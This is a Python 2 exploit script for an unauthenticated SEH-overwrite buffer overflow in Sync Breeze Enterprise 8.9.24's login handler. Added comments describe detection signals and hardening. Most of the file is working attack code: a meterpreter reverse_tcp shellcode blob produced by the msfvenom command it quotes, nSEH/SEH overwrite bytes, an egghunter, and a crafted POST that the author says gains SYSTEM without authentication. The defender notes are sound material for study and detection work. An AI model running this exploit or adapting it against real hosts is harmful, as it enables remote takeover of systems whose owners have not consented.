#!/usr/bin/python
# Python 2 script (print statements, str-as-bytes); it will not run unmodified on Python 3.
#
# Proof-of-concept for a stack buffer overflow in the Sync Breeze Enterprise 8.9.24
# web login handler. The nSEH/SEH pair and the "pop pop ret" comment below indicate
# an SEH-overwrite technique; the "w00tw00t" tag plus the egghunter stub indicate
# the final payload is located in memory by tag search rather than by a fixed offset.
#
# Defender notes (derived from what this script sends):
#   - Traffic shape: one TCP connection to port 83, a single HTTP POST to /login with
#     a body of tens of kilobytes made almost entirely of repeated 0x41 / 0x42 / 0x90
#     bytes, a "username=admin&password=aaaaa" prefix and a Content-Length header
#     (17000) that does not match the number of bytes actually transmitted. Each of
#     those is a cheap signal for a reverse proxy, WAF or IDS in front of the service.
#   - The author states no authentication is required, so exposure of this port to
#     any untrusted network is the risk, independent of credential strength.
#   - Mitigation is upgrading the affected product version; the fixed version is not
#     stated on this page.
print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
import socket
import sys
# Plain TCP socket; the target IP and port (83) are hard-coded here.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is never meaningful and is unused below.
connect=s.connect(('192.168.1.100',83))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
# `buf` is the encoded second-stage payload emitted by the msfvenom command above.
# The byte values are opaque encoder output; nothing below depends on their meaning,
# only on the blob being placed after the "w00tw00t" tag.
buf = ""
buf += "\xb8\xb5\x94\x3a\x99\xda\xc5\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x47\x83\xc3\x04\x31\x43\x11\x03\x43\x11\xe2"
buf += "\x40\x68\xd2\x1b\xaa\x91\x23\x7c\x23\x74\x12\xbc\x57"
buf += "\xfc\x05\x0c\x1c\x50\xaa\xe7\x70\x41\x39\x85\x5c\x66"
buf += "\x8a\x20\xba\x49\x0b\x18\xfe\xc8\x8f\x63\xd2\x2a\xb1"
buf += "\xab\x27\x2a\xf6\xd6\xc5\x7e\xaf\x9d\x7b\x6f\xc4\xe8"
buf += "\x47\x04\x96\xfd\xcf\xf9\x6f\xff\xfe\xaf\xe4\xa6\x20"
buf += "\x51\x28\xd3\x69\x49\x2d\xde\x20\xe2\x85\x94\xb3\x22"
buf += "\xd4\x55\x1f\x0b\xd8\xa7\x5e\x4b\xdf\x57\x15\xa5\x23"
buf += "\xe5\x2d\x72\x59\x31\xb8\x61\xf9\xb2\x1a\x4e\xfb\x17"
buf += "\xfc\x05\xf7\xdc\x8b\x42\x14\xe2\x58\xf9\x20\x6f\x5f"
buf += "\x2e\xa1\x2b\x7b\xea\xe9\xe8\xe2\xab\x57\x5e\x1b\xab"
buf += "\x37\x3f\xb9\xa7\xda\x54\xb0\xe5\xb2\x99\xf8\x15\x43"
buf += "\xb6\x8b\x66\x71\x19\x27\xe1\x39\xd2\xe1\xf6\x48\xf4"
buf += "\x12\x28\xf2\x95\xed\xc9\x03\xbf\x29\x9d\x53\xd7\x98"
buf += "\x9e\x3f\x27\x25\x4b\xd5\x2d\xb1\xb4\x82\x33\x83\x5d"
buf += "\xd1\x33\x12\xc2\x5c\xd5\x44\xaa\x0e\x4a\x24\x1a\xef"
buf += "\x3a\xcc\x70\xe0\x65\xec\x7a\x2a\x0e\x86\x94\x83\x66"
buf += "\x3e\x0c\x8e\xfd\xdf\xd1\x04\x78\xdf\x5a\xab\x7c\x91"
buf += "\xaa\xc6\x6e\x45\x5b\x9d\xcd\xc3\x64\x0b\x7b\xeb\xf0"
buf += "\xb0\x2a\xbc\x6c\xbb\x0b\x8a\x32\x44\x7e\x81\xfb\xd0"
buf += "\xc1\xfd\x03\x35\xc2\xfd\x55\x5f\xc2\x95\x01\x3b\x91"
buf += "\x80\x4d\x96\x85\x19\xd8\x19\xfc\xce\x4b\x72\x02\x29"
buf += "\xbb\xdd\xfd\x1c\x3d\x21\x28\x58\x4b\x4b\xe8"
#pop pop ret 10030991
# Overwritten exception record: `nseh` (next-handler field) and `seh` (handler field).
# `seh` is the address from the comment above written little-endian, i.e. the
# technique depends on a module loaded at a fixed base — ASLR/SafeSEH-enabled builds
# of the dependent module would break this, which is the relevant hardening angle.
nseh = "\x90\x90\xEB\x0B"
seh = "\x91\x09\x03\x10"
# Egghunter stub: scans memory for the 4-byte tag "w00t" (\x77\x30\x30\x74 appears in
# the second line) repeated twice, i.e. the "w00tw00t" marker placed before `buf` below.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Hand-built HTTP/1.1 POST. Note the Host header is a different hard-coded address
# (192.168.123.132) than the one the socket connects to; the server evidently does
# not validate it.
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
# NOTE(review): the declared length (17000) is not the byte count of everything
# appended after the blank line; the body actually sent is larger. A length/body
# mismatch on a form POST is itself a useful detection characteristic.
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
# Body layout, in order: form fields, 0x41 filler up to the vulnerable offset, the
# "w00tw00t" tag + NOP sled + `buf`, more filler (0x90, then 0x42), the nSEH/SEH
# overwrite, a NOP sled into the egghunter, then a large 0x90 tail.
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12290 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
print 'Sending evil buffer...'
# The request is written and the socket closed without reading any response, so the
# script gives no indication of success or failure on its own.
s.send(evil)
print 'Payload Sent!'
s.close()